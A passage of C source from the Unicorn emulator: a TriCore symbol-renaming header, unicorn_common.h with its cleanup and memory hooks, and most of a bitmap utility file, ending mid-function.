helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_tricore 
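/*
 * A minimal sketch of the renaming pattern used throughout this header
 * (an editorial note, not from the original file), assuming a
 * hypothetical shared symbol foo(): every QEMU symbol is remapped to a
 * per-target name so that multiple architecture builds can be linked
 * into a single Unicorn binary without symbol collisions:
 *
 *     #define foo foo_tricore   // the tricore build emits and calls foo_tricore
 *
 * Source code keeps referring to foo(); only the linker-visible name changes.
 */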
#define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_tricore #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_tricore #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_tricore #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_tricore #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_tricore #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_tricore #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_tricore #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_tricore #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_tricore #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_tricore #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_tricore #define helper_atomic_xchgq_be helper_atomic_xchgq_be_tricore #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_tricore #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_tricore #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_tricore #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_tricore #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_tricore #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_tricore #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_tricore #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_tricore #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_tricore #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_tricore #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_tricore #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_tricore #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_tricore #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_tricore #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_tricore #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_tricore #define cpu_ldub_code cpu_ldub_code_tricore #define cpu_lduw_code cpu_lduw_code_tricore #define cpu_ldl_code cpu_ldl_code_tricore #define cpu_ldq_code cpu_ldq_code_tricore #define helper_div_i32 helper_div_i32_tricore #define helper_rem_i32 helper_rem_i32_tricore #define helper_divu_i32 helper_divu_i32_tricore #define helper_remu_i32 helper_remu_i32_tricore #define helper_shl_i64 helper_shl_i64_tricore #define helper_shr_i64 helper_shr_i64_tricore #define helper_sar_i64 helper_sar_i64_tricore #define helper_div_i64 helper_div_i64_tricore #define helper_rem_i64 helper_rem_i64_tricore #define helper_divu_i64 helper_divu_i64_tricore #define helper_remu_i64 helper_remu_i64_tricore #define helper_muluh_i64 helper_muluh_i64_tricore #define helper_mulsh_i64 helper_mulsh_i64_tricore #define helper_clz_i32 helper_clz_i32_tricore #define helper_ctz_i32 helper_ctz_i32_tricore #define helper_clz_i64 helper_clz_i64_tricore #define helper_ctz_i64 helper_ctz_i64_tricore #define helper_clrsb_i32 helper_clrsb_i32_tricore #define helper_clrsb_i64 helper_clrsb_i64_tricore #define helper_ctpop_i32 helper_ctpop_i32_tricore #define helper_ctpop_i64 helper_ctpop_i64_tricore #define helper_lookup_tb_ptr helper_lookup_tb_ptr_tricore #define helper_exit_atomic helper_exit_atomic_tricore #define helper_gvec_add8 helper_gvec_add8_tricore #define helper_gvec_add16 helper_gvec_add16_tricore #define helper_gvec_add32 helper_gvec_add32_tricore #define helper_gvec_add64 helper_gvec_add64_tricore #define helper_gvec_adds8 
helper_gvec_adds8_tricore #define helper_gvec_adds16 helper_gvec_adds16_tricore #define helper_gvec_adds32 helper_gvec_adds32_tricore #define helper_gvec_adds64 helper_gvec_adds64_tricore #define helper_gvec_sub8 helper_gvec_sub8_tricore #define helper_gvec_sub16 helper_gvec_sub16_tricore #define helper_gvec_sub32 helper_gvec_sub32_tricore #define helper_gvec_sub64 helper_gvec_sub64_tricore #define helper_gvec_subs8 helper_gvec_subs8_tricore #define helper_gvec_subs16 helper_gvec_subs16_tricore #define helper_gvec_subs32 helper_gvec_subs32_tricore #define helper_gvec_subs64 helper_gvec_subs64_tricore #define helper_gvec_mul8 helper_gvec_mul8_tricore #define helper_gvec_mul16 helper_gvec_mul16_tricore #define helper_gvec_mul32 helper_gvec_mul32_tricore #define helper_gvec_mul64 helper_gvec_mul64_tricore #define helper_gvec_muls8 helper_gvec_muls8_tricore #define helper_gvec_muls16 helper_gvec_muls16_tricore #define helper_gvec_muls32 helper_gvec_muls32_tricore #define helper_gvec_muls64 helper_gvec_muls64_tricore #define helper_gvec_neg8 helper_gvec_neg8_tricore #define helper_gvec_neg16 helper_gvec_neg16_tricore #define helper_gvec_neg32 helper_gvec_neg32_tricore #define helper_gvec_neg64 helper_gvec_neg64_tricore #define helper_gvec_abs8 helper_gvec_abs8_tricore #define helper_gvec_abs16 helper_gvec_abs16_tricore #define helper_gvec_abs32 helper_gvec_abs32_tricore #define helper_gvec_abs64 helper_gvec_abs64_tricore #define helper_gvec_mov helper_gvec_mov_tricore #define helper_gvec_dup64 helper_gvec_dup64_tricore #define helper_gvec_dup32 helper_gvec_dup32_tricore #define helper_gvec_dup16 helper_gvec_dup16_tricore #define helper_gvec_dup8 helper_gvec_dup8_tricore #define helper_gvec_not helper_gvec_not_tricore #define helper_gvec_and helper_gvec_and_tricore #define helper_gvec_or helper_gvec_or_tricore #define helper_gvec_xor helper_gvec_xor_tricore #define helper_gvec_andc helper_gvec_andc_tricore #define helper_gvec_orc helper_gvec_orc_tricore #define helper_gvec_nand helper_gvec_nand_tricore #define helper_gvec_nor helper_gvec_nor_tricore #define helper_gvec_eqv helper_gvec_eqv_tricore #define helper_gvec_ands helper_gvec_ands_tricore #define helper_gvec_xors helper_gvec_xors_tricore #define helper_gvec_ors helper_gvec_ors_tricore #define helper_gvec_shl8i helper_gvec_shl8i_tricore #define helper_gvec_shl16i helper_gvec_shl16i_tricore #define helper_gvec_shl32i helper_gvec_shl32i_tricore #define helper_gvec_shl64i helper_gvec_shl64i_tricore #define helper_gvec_shr8i helper_gvec_shr8i_tricore #define helper_gvec_shr16i helper_gvec_shr16i_tricore #define helper_gvec_shr32i helper_gvec_shr32i_tricore #define helper_gvec_shr64i helper_gvec_shr64i_tricore #define helper_gvec_sar8i helper_gvec_sar8i_tricore #define helper_gvec_sar16i helper_gvec_sar16i_tricore #define helper_gvec_sar32i helper_gvec_sar32i_tricore #define helper_gvec_sar64i helper_gvec_sar64i_tricore #define helper_gvec_shl8v helper_gvec_shl8v_tricore #define helper_gvec_shl16v helper_gvec_shl16v_tricore #define helper_gvec_shl32v helper_gvec_shl32v_tricore #define helper_gvec_shl64v helper_gvec_shl64v_tricore #define helper_gvec_shr8v helper_gvec_shr8v_tricore #define helper_gvec_shr16v helper_gvec_shr16v_tricore #define helper_gvec_shr32v helper_gvec_shr32v_tricore #define helper_gvec_shr64v helper_gvec_shr64v_tricore #define helper_gvec_sar8v helper_gvec_sar8v_tricore #define helper_gvec_sar16v helper_gvec_sar16v_tricore #define helper_gvec_sar32v helper_gvec_sar32v_tricore #define helper_gvec_sar64v 
helper_gvec_sar64v_tricore #define helper_gvec_eq8 helper_gvec_eq8_tricore #define helper_gvec_ne8 helper_gvec_ne8_tricore #define helper_gvec_lt8 helper_gvec_lt8_tricore #define helper_gvec_le8 helper_gvec_le8_tricore #define helper_gvec_ltu8 helper_gvec_ltu8_tricore #define helper_gvec_leu8 helper_gvec_leu8_tricore #define helper_gvec_eq16 helper_gvec_eq16_tricore #define helper_gvec_ne16 helper_gvec_ne16_tricore #define helper_gvec_lt16 helper_gvec_lt16_tricore #define helper_gvec_le16 helper_gvec_le16_tricore #define helper_gvec_ltu16 helper_gvec_ltu16_tricore #define helper_gvec_leu16 helper_gvec_leu16_tricore #define helper_gvec_eq32 helper_gvec_eq32_tricore #define helper_gvec_ne32 helper_gvec_ne32_tricore #define helper_gvec_lt32 helper_gvec_lt32_tricore #define helper_gvec_le32 helper_gvec_le32_tricore #define helper_gvec_ltu32 helper_gvec_ltu32_tricore #define helper_gvec_leu32 helper_gvec_leu32_tricore #define helper_gvec_eq64 helper_gvec_eq64_tricore #define helper_gvec_ne64 helper_gvec_ne64_tricore #define helper_gvec_lt64 helper_gvec_lt64_tricore #define helper_gvec_le64 helper_gvec_le64_tricore #define helper_gvec_ltu64 helper_gvec_ltu64_tricore #define helper_gvec_leu64 helper_gvec_leu64_tricore #define helper_gvec_ssadd8 helper_gvec_ssadd8_tricore #define helper_gvec_ssadd16 helper_gvec_ssadd16_tricore #define helper_gvec_ssadd32 helper_gvec_ssadd32_tricore #define helper_gvec_ssadd64 helper_gvec_ssadd64_tricore #define helper_gvec_sssub8 helper_gvec_sssub8_tricore #define helper_gvec_sssub16 helper_gvec_sssub16_tricore #define helper_gvec_sssub32 helper_gvec_sssub32_tricore #define helper_gvec_sssub64 helper_gvec_sssub64_tricore #define helper_gvec_usadd8 helper_gvec_usadd8_tricore #define helper_gvec_usadd16 helper_gvec_usadd16_tricore #define helper_gvec_usadd32 helper_gvec_usadd32_tricore #define helper_gvec_usadd64 helper_gvec_usadd64_tricore #define helper_gvec_ussub8 helper_gvec_ussub8_tricore #define helper_gvec_ussub16 helper_gvec_ussub16_tricore #define helper_gvec_ussub32 helper_gvec_ussub32_tricore #define helper_gvec_ussub64 helper_gvec_ussub64_tricore #define helper_gvec_smin8 helper_gvec_smin8_tricore #define helper_gvec_smin16 helper_gvec_smin16_tricore #define helper_gvec_smin32 helper_gvec_smin32_tricore #define helper_gvec_smin64 helper_gvec_smin64_tricore #define helper_gvec_smax8 helper_gvec_smax8_tricore #define helper_gvec_smax16 helper_gvec_smax16_tricore #define helper_gvec_smax32 helper_gvec_smax32_tricore #define helper_gvec_smax64 helper_gvec_smax64_tricore #define helper_gvec_umin8 helper_gvec_umin8_tricore #define helper_gvec_umin16 helper_gvec_umin16_tricore #define helper_gvec_umin32 helper_gvec_umin32_tricore #define helper_gvec_umin64 helper_gvec_umin64_tricore #define helper_gvec_umax8 helper_gvec_umax8_tricore #define helper_gvec_umax16 helper_gvec_umax16_tricore #define helper_gvec_umax32 helper_gvec_umax32_tricore #define helper_gvec_umax64 helper_gvec_umax64_tricore #define helper_gvec_bitsel helper_gvec_bitsel_tricore #define cpu_restore_state cpu_restore_state_tricore #define page_collection_lock page_collection_lock_tricore #define page_collection_unlock page_collection_unlock_tricore #define free_code_gen_buffer free_code_gen_buffer_tricore #define tcg_exec_init tcg_exec_init_tricore #define tb_cleanup tb_cleanup_tricore #define tb_flush tb_flush_tricore #define tb_phys_invalidate tb_phys_invalidate_tricore #define tb_gen_code tb_gen_code_tricore #define tb_exec_lock tb_exec_lock_tricore #define tb_exec_unlock 
tb_exec_unlock_tricore
#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_tricore
#define tb_invalidate_phys_range tb_invalidate_phys_range_tricore
#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_tricore
#define tb_check_watchpoint tb_check_watchpoint_tricore
#define cpu_io_recompile cpu_io_recompile_tricore
#define tb_flush_jmp_cache tb_flush_jmp_cache_tricore
#define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_tricore
#define translator_loop_temp_check translator_loop_temp_check_tricore
#define translator_loop translator_loop_tricore
#define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_tricore
#define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_tricore
#define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_tricore
#define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_tricore
#define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_tricore
#define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_tricore
#define unassigned_mem_ops unassigned_mem_ops_tricore
#define floatx80_infinity floatx80_infinity_tricore
#define dup_const_func dup_const_func_tricore
#define gen_helper_raise_exception gen_helper_raise_exception_tricore
#define gen_helper_raise_interrupt gen_helper_raise_interrupt_tricore
#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_tricore
#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_tricore
#define gen_helper_cpsr_read gen_helper_cpsr_read_tricore
#define gen_helper_cpsr_write gen_helper_cpsr_write_tricore
#define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_tricore
#define helper_fadd helper_fadd_tricore
#define helper_fsub helper_fsub_tricore
#define helper_fmul helper_fmul_tricore
#define helper_fdiv helper_fdiv_tricore
#define helper_fmadd helper_fmadd_tricore
#define helper_fmsub helper_fmsub_tricore
#define helper_pack helper_pack_tricore
#define gen_intermediate_code gen_intermediate_code_tricore
#define restore_state_to_opc restore_state_to_opc_tricore
#define helper_uc_tricore_exit helper_uc_tricore_exit_tricore
#endif

unicorn-2.1.1/qemu/unicorn_common.h

/* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */
#ifndef UNICORN_COMMON_H
#define UNICORN_COMMON_H

#include "tcg/tcg.h"
#include "qemu-common.h"
#include "exec/memory.h"

// This header defines common patterns/code that will be included in all
// arch-specific code for Unicorn's purposes.
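// A hedged illustration (an editorial sketch, not from the original file)
// of how an arch-specific backend consumes this header: its init routine
// installs the common hooks via uc_common_init() below and then adds its
// own handlers. The uc_init_arch/arch_reg_read/arch_reg_write names are
// hypothetical placeholders:
//
//   static void uc_init_arch(struct uc_struct *uc)
//   {
//       uc_common_init(uc);             // common read/write/map hooks
//       uc->reg_read = arch_reg_read;   // hypothetical arch-specific hooks
//       uc->reg_write = arch_reg_write;
//   }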
void vm_start(struct uc_struct*);
void tcg_exec_init(struct uc_struct *uc, uint32_t tb_size);
bool unicorn_fill_tlb(CPUState *cs, vaddr address, int size,
                      MMUAccessType rw, int mmu_idx,
                      bool probe, uintptr_t retaddr);

// return true on success, false on failure
static inline bool cpu_physical_mem_read(AddressSpace *as, hwaddr addr,
                                         uint8_t *buf, int len)
{
    return cpu_physical_memory_rw(as, addr, (void *)buf, len, 0);
}

static inline bool cpu_physical_mem_write(AddressSpace *as, hwaddr addr,
                                          const uint8_t *buf, int len)
{
    return cpu_physical_memory_rw(as, addr, (void *)buf, len, 1);
}

void tb_cleanup(struct uc_struct *uc);
void free_code_gen_buffer(struct uc_struct *uc);

/** Freeing common resources */
static void release_common(void *t)
{
    TCGPool *po, *to;
    TCGContext *s = (TCGContext *)t;
#if TCG_TARGET_REG_BITS == 32
    int i;
#endif

    // Clean TCG.
    TCGOpDef *def = s->tcg_op_defs;
    g_free(def->args_ct);
    g_free(def->sorted_args);
    g_free(s->tcg_op_defs);

    for (po = s->pool_first; po; po = to) {
        to = po->next;
        g_free(po);
    }
    tcg_pool_reset(s);
    g_hash_table_destroy(s->helper_table);
    g_hash_table_destroy(s->custom_helper_infos);
    g_free(s->indirect_reg_alloc_order);
    /* qemu/tcg/tcg.c:4018: img = g_malloc(img_size); */
    g_free((void *)(s->one_entry->symfile_addr));
    g_free(s->one_entry);
    /* qemu/tcg/tcg.c:574: tcg_ctx->tree = g_tree_new(tb_tc_cmp); */
    g_tree_destroy(s->tree);

    // These functions are not available outside qemu,
    // so we keep them here instead of outside uc_close.
    memory_free(s->uc);
    address_space_destroy(&s->uc->address_space_memory);
    address_space_destroy(&s->uc->address_space_io);

    /* clean up uc->l1_map. */
    tb_cleanup(s->uc);

    /* clean up tcg_ctx->code_gen_buffer. */
    free_code_gen_buffer(s->uc);

    /* qemu/util/qht.c:264: map = qht_map_create(n_buckets); */
    qht_destroy(&s->tb_ctx.htable);

    cpu_watchpoint_remove_all(CPU(s->uc->cpu), BP_CPU);
    cpu_breakpoint_remove_all(CPU(s->uc->cpu), BP_CPU);

#if TCG_TARGET_REG_BITS == 32
    for (i = 0; i < s->nb_globals; i++) {
        TCGTemp *ts = &s->temps[i];
        if (ts->base_type == TCG_TYPE_I64) {
            if (ts->name &&
                ((strcmp(ts->name + (strlen(ts->name) - 2), "_0") == 0) ||
                 (strcmp(ts->name + (strlen(ts->name) - 2), "_1") == 0))) {
                free((void *)ts->name);
            }
        }
    }
#endif
}

static inline void target_page_init(struct uc_struct *uc)
{
    uc->target_page_size = TARGET_PAGE_SIZE;
    uc->target_page_align = TARGET_PAGE_SIZE - 1;
}

static uc_err uc_set_tlb(struct uc_struct *uc, int mode)
{
    switch (mode) {
    case UC_TLB_VIRTUAL:
        uc->cpu->cc->tlb_fill = unicorn_fill_tlb;
        return UC_ERR_OK;
    case UC_TLB_CPU:
        uc->cpu->cc->tlb_fill = uc->cpu->cc->tlb_fill_cpu;
        return UC_ERR_OK;
    default:
        return UC_ERR_ARG;
    }
}

MemoryRegion *find_memory_mapping(struct uc_struct *uc, hwaddr address)
{
    hwaddr xlat = 0;
    hwaddr len = 1;
    MemoryRegion *mr = address_space_translate(&uc->address_space_memory,
                                               address, &xlat, &len, false,
                                               MEMTXATTRS_UNSPECIFIED);
    if (mr == &uc->io_mem_unassigned) {
        return NULL;
    }
    return mr;
}

void softfloat_init(void);

static inline void uc_common_init(struct uc_struct *uc)
{
    uc->write_mem = cpu_physical_mem_write;
    uc->read_mem = cpu_physical_mem_read;
    uc->tcg_exec_init = tcg_exec_init;
    uc->cpu_exec_init_all = cpu_exec_init_all;
    uc->vm_start = vm_start;
    uc->memory_map = memory_map;
    uc->memory_map_ptr = memory_map_ptr;
    uc->memory_unmap = memory_unmap;
    uc->memory_moveout = memory_moveout;
    uc->memory_movein = memory_movein;
    uc->readonly_mem = memory_region_set_readonly;
    uc->target_page = target_page_init;
    uc->softfloat_initialize = softfloat_init;
    uc->tcg_flush_tlb = tcg_flush_softmmu_tlb;
    uc->memory_map_io = memory_map_io;
    uc->set_tlb = uc_set_tlb;
    uc->memory_mapping = find_memory_mapping;
    uc->memory_filter_subregions = memory_region_filter_subregions;
    uc->memory_cow = memory_cow;

    if (!uc->release)
        uc->release = release_common;
}

#define CHECK_REG_TYPE(type) do {             \
    if (unlikely(*size < sizeof(type))) {     \
        return UC_ERR_OVERFLOW;               \
    }                                         \
    *size = sizeof(type);                     \
    ret = UC_ERR_OK;                          \
} while(0)

#endif

unicorn-2.1.1/qemu/util/bitmap.c

/*
 * Bitmap Module
 *
 * Stolen from linux/src/lib/bitmap.c
 *
 * Copyright (C) 2010 Corentin Chary
 *
 * This source code is licensed under the GNU General Public License,
 * Version 2.
 */

#include "qemu/osdep.h"
#include "qemu/bitops.h"
#include "qemu/bitmap.h"
#include "qemu/atomic.h"

/*
 * bitmaps provide an array of bits, implemented using an
 * array of unsigned longs.  The number of valid bits in a
 * given bitmap does _not_ need to be an exact multiple of
 * BITS_PER_LONG.
 *
 * The possible unused bits in the last, partially used word
 * of a bitmap are 'don't care'.  The implementation makes
 * no particular effort to keep them zero.  It ensures that
 * their value will not affect the results of any operation.
 * The bitmap operations that return Boolean (bitmap_empty,
 * for example) or scalar (bitmap_weight, for example) results
 * carefully filter out these unused bits from impacting their
 * results.
 *
 * These operations actually hold to a slightly stronger rule:
 * if you don't input any bitmaps to these ops that have some
 * unused bits set, then they won't output any set unused bits
 * in output bitmaps.
 *
 * The byte ordering of bitmaps is more natural on little
 * endian architectures.
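 *
 * A small worked example (an editorial sketch, not from the original
 * comment): with 64-bit longs a 70-bit bitmap spans two words, and
 * BITMAP_LAST_WORD_MASK(70) selects only the 6 valid bits of the
 * final word:
 *
 *   unsigned long map[BITS_TO_LONGS(70)];  // 2 words when BITS_PER_LONG == 64
 *   map[1] &= BITMAP_LAST_WORD_MASK(70);   // keep bits 64..69, clear the rest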
*/ int slow_bitmap_empty(const unsigned long *bitmap, long bits) { long k, lim = bits/BITS_PER_LONG; for (k = 0; k < lim; ++k) { if (bitmap[k]) { return 0; } } if (bits % BITS_PER_LONG) { if (bitmap[k] & BITMAP_LAST_WORD_MASK(bits)) { return 0; } } return 1; } int slow_bitmap_full(const unsigned long *bitmap, long bits) { long k, lim = bits/BITS_PER_LONG; for (k = 0; k < lim; ++k) { if (~bitmap[k]) { return 0; } } if (bits % BITS_PER_LONG) { if (~bitmap[k] & BITMAP_LAST_WORD_MASK(bits)) { return 0; } } return 1; } int slow_bitmap_equal(const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k, lim = bits/BITS_PER_LONG; for (k = 0; k < lim; ++k) { if (bitmap1[k] != bitmap2[k]) { return 0; } } if (bits % BITS_PER_LONG) { if ((bitmap1[k] ^ bitmap2[k]) & BITMAP_LAST_WORD_MASK(bits)) { return 0; } } return 1; } void slow_bitmap_complement(unsigned long *dst, const unsigned long *src, long bits) { long k, lim = bits/BITS_PER_LONG; for (k = 0; k < lim; ++k) { dst[k] = ~src[k]; } if (bits % BITS_PER_LONG) { dst[k] = ~src[k] & BITMAP_LAST_WORD_MASK(bits); } } int slow_bitmap_and(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k; long nr = BITS_TO_LONGS(bits); unsigned long result = 0; for (k = 0; k < nr; k++) { result |= (dst[k] = bitmap1[k] & bitmap2[k]); } return result != 0; } void slow_bitmap_or(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k; long nr = BITS_TO_LONGS(bits); for (k = 0; k < nr; k++) { dst[k] = bitmap1[k] | bitmap2[k]; } } void slow_bitmap_xor(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k; long nr = BITS_TO_LONGS(bits); for (k = 0; k < nr; k++) { dst[k] = bitmap1[k] ^ bitmap2[k]; } } int slow_bitmap_andnot(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k; long nr = BITS_TO_LONGS(bits); unsigned long result = 0; for (k = 0; k < nr; k++) { result |= (dst[k] = bitmap1[k] & ~bitmap2[k]); } return result != 0; } void qemu_bitmap_set(unsigned long *map, long start, long nr) { unsigned long *p = map + BIT_WORD(start); const long size = start + nr; int bits_to_set = BITS_PER_LONG - (start % BITS_PER_LONG); unsigned long mask_to_set = BITMAP_FIRST_WORD_MASK(start); assert(start >= 0 && nr >= 0); while (nr - bits_to_set >= 0) { *p |= mask_to_set; nr -= bits_to_set; bits_to_set = BITS_PER_LONG; mask_to_set = ~0UL; p++; } if (nr) { mask_to_set &= BITMAP_LAST_WORD_MASK(size); *p |= mask_to_set; } } void bitmap_set_atomic(unsigned long *map, long start, long nr) { unsigned long *p = map + BIT_WORD(start); const long size = start + nr; int bits_to_set = BITS_PER_LONG - (start % BITS_PER_LONG); unsigned long mask_to_set = BITMAP_FIRST_WORD_MASK(start); assert(start >= 0 && nr >= 0); /* First word */ if (nr - bits_to_set > 0) { atomic_or(p, mask_to_set); nr -= bits_to_set; bits_to_set = BITS_PER_LONG; mask_to_set = ~0UL; p++; } /* Full words */ if (bits_to_set == BITS_PER_LONG) { while (nr >= BITS_PER_LONG) { *p = ~0UL; nr -= BITS_PER_LONG; p++; } } /* Last word */ if (nr) { mask_to_set &= BITMAP_LAST_WORD_MASK(size); atomic_or(p, mask_to_set); } else { /* If we avoided the full barrier in atomic_or(), issue a * barrier to account for the assignments in the while loop. 
*/ smp_mb(); } } void qemu_bitmap_clear(unsigned long *map, long start, long nr) { unsigned long *p = map + BIT_WORD(start); const long size = start + nr; int bits_to_clear = BITS_PER_LONG - (start % BITS_PER_LONG); unsigned long mask_to_clear = BITMAP_FIRST_WORD_MASK(start); assert(start >= 0 && nr >= 0); while (nr - bits_to_clear >= 0) { *p &= ~mask_to_clear; nr -= bits_to_clear; bits_to_clear = BITS_PER_LONG; mask_to_clear = ~0UL; p++; } if (nr) { mask_to_clear &= BITMAP_LAST_WORD_MASK(size); *p &= ~mask_to_clear; } } bool bitmap_test_and_clear_atomic(unsigned long *map, long start, long nr) { unsigned long *p = map + BIT_WORD(start); const long size = start + nr; int bits_to_clear = BITS_PER_LONG - (start % BITS_PER_LONG); unsigned long mask_to_clear = BITMAP_FIRST_WORD_MASK(start); unsigned long dirty = 0; unsigned long old_bits; assert(start >= 0 && nr >= 0); /* First word */ if (nr - bits_to_clear > 0) { old_bits = atomic_fetch_and(p, ~mask_to_clear); dirty |= old_bits & mask_to_clear; nr -= bits_to_clear; bits_to_clear = BITS_PER_LONG; mask_to_clear = ~0UL; p++; } /* Full words */ if (bits_to_clear == BITS_PER_LONG) { while (nr >= BITS_PER_LONG) { if (*p) { old_bits = *p; *p = 0; dirty |= old_bits; } nr -= BITS_PER_LONG; p++; } } /* Last word */ if (nr) { mask_to_clear &= BITMAP_LAST_WORD_MASK(size); old_bits = atomic_fetch_and(p, ~mask_to_clear); dirty |= old_bits & mask_to_clear; } else { if (!dirty) { smp_mb(); } } return dirty != 0; } void bitmap_copy_and_clear_atomic(unsigned long *dst, unsigned long *src, long nr) { while (nr > 0) { *dst = *src; *src = 0; dst++; src++; nr -= BITS_PER_LONG; } } #define ALIGN_MASK(x,mask) (((x)+(mask))&~(mask)) /** * bitmap_find_next_zero_area - find a contiguous aligned zero area * @map: The address to base the search on * @size: The bitmap size in bits * @start: The bitnumber to start searching at * @nr: The number of zeroed bits we're looking for * @align_mask: Alignment mask for zero area * * The @align_mask should be one less than a power of 2; the effect is that * the bit offset of all zero areas this function finds is multiples of that * power of 2. A @align_mask of 0 means no alignment is required. 
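 *
 * A hedged usage sketch (not part of the original comment): find and
 * claim a 4-bit zero run aligned to a multiple of 4 in a 128-bit map;
 * on failure the function returns a value larger than @size, so the
 * bounds check below doubles as the success test:
 *
 *   unsigned long off = bitmap_find_next_zero_area(map, 128, 0, 4, 3);
 *   if (off + 4 <= 128) {
 *       qemu_bitmap_set(map, off, 4);
 *   }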
*/ unsigned long bitmap_find_next_zero_area(unsigned long *map, unsigned long size, unsigned long start, unsigned long nr, unsigned long align_mask) { unsigned long index, end, i; again: index = find_next_zero_bit(map, size, start); /* Align allocation */ index = ALIGN_MASK(index, align_mask); end = index + nr; if (end > size) { return end; } i = find_next_bit(map, end, index); if (i < end) { start = i + 1; goto again; } return index; } int slow_bitmap_intersects(const unsigned long *bitmap1, const unsigned long *bitmap2, long bits) { long k, lim = bits/BITS_PER_LONG; for (k = 0; k < lim; ++k) { if (bitmap1[k] & bitmap2[k]) { return 1; } } if (bits % BITS_PER_LONG) { if ((bitmap1[k] & bitmap2[k]) & BITMAP_LAST_WORD_MASK(bits)) { return 1; } } return 0; } long slow_bitmap_count_one(const unsigned long *bitmap, long nbits) { long k, lim = nbits / BITS_PER_LONG, result = 0; for (k = 0; k < lim; k++) { result += ctpopl(bitmap[k]); } if (nbits % BITS_PER_LONG) { result += ctpopl(bitmap[k] & BITMAP_LAST_WORD_MASK(nbits)); } return result; } static void bitmap_to_from_le(unsigned long *dst, const unsigned long *src, long nbits) { long len = BITS_TO_LONGS(nbits); #ifdef HOST_WORDS_BIGENDIAN long index; for (index = 0; index < len; index++) { # if HOST_LONG_BITS == 64 dst[index] = bswap64(src[index]); # else dst[index] = bswap32(src[index]); # endif } #else memcpy(dst, src, len * sizeof(unsigned long)); #endif } void bitmap_from_le(unsigned long *dst, const unsigned long *src, long nbits) { bitmap_to_from_le(dst, src, nbits); } void bitmap_to_le(unsigned long *dst, const unsigned long *src, long nbits) { bitmap_to_from_le(dst, src, nbits); } /* * Copy "src" bitmap with a positive offset and put it into the "dst" * bitmap. The caller needs to make sure the bitmap size of "src" * is bigger than (shift + nbits). */ void bitmap_copy_with_src_offset(unsigned long *dst, const unsigned long *src, unsigned long shift, unsigned long nbits) { unsigned long left_mask, right_mask, last_mask; /* Proper shift src pointer to the first word to copy from */ src += BIT_WORD(shift); shift %= BITS_PER_LONG; if (!shift) { /* Fast path */ bitmap_copy(dst, src, nbits); return; } right_mask = (1ul << shift) - 1; left_mask = ~right_mask; while (nbits >= BITS_PER_LONG) { *dst = (*src & left_mask) >> shift; *dst |= (src[1] & right_mask) << (BITS_PER_LONG - shift); dst++; src++; nbits -= BITS_PER_LONG; } if (nbits > BITS_PER_LONG - shift) { *dst = (*src & left_mask) >> shift; nbits -= BITS_PER_LONG - shift; last_mask = (1ul << nbits) - 1; *dst |= (src[1] & last_mask) << (BITS_PER_LONG - shift); } else if (nbits) { last_mask = (1ul << nbits) - 1; *dst = (*src >> shift) & last_mask; } } /* * Copy "src" bitmap into the "dst" bitmap with an offset in the * "dst". The caller needs to make sure the bitmap size of "dst" is * bigger than (shift + nbits). 
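 *
 * Hedged example (an editorial addition): copying 32 bits from src into
 * dst starting at dst bit 8 requires dst to hold at least 8 + 32 = 40
 * bits:
 *
 *   bitmap_copy_with_dst_offset(dst, src, 8, 32);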
 */
void bitmap_copy_with_dst_offset(unsigned long *dst, const unsigned long *src,
                                 unsigned long shift, unsigned long nbits)
{
    unsigned long left_mask, right_mask, last_mask;

    /* Proper shift dst pointer to the first word to copy from */
    dst += BIT_WORD(shift);
    shift %= BITS_PER_LONG;

    if (!shift) {
        /* Fast path */
        bitmap_copy(dst, src, nbits);
        return;
    }

    right_mask = (1ul << (BITS_PER_LONG - shift)) - 1;
    left_mask = ~right_mask;

    *dst &= (1ul << shift) - 1;
    while (nbits >= BITS_PER_LONG) {
        *dst |= (*src & right_mask) << shift;
        dst[1] = (*src & left_mask) >> (BITS_PER_LONG - shift);
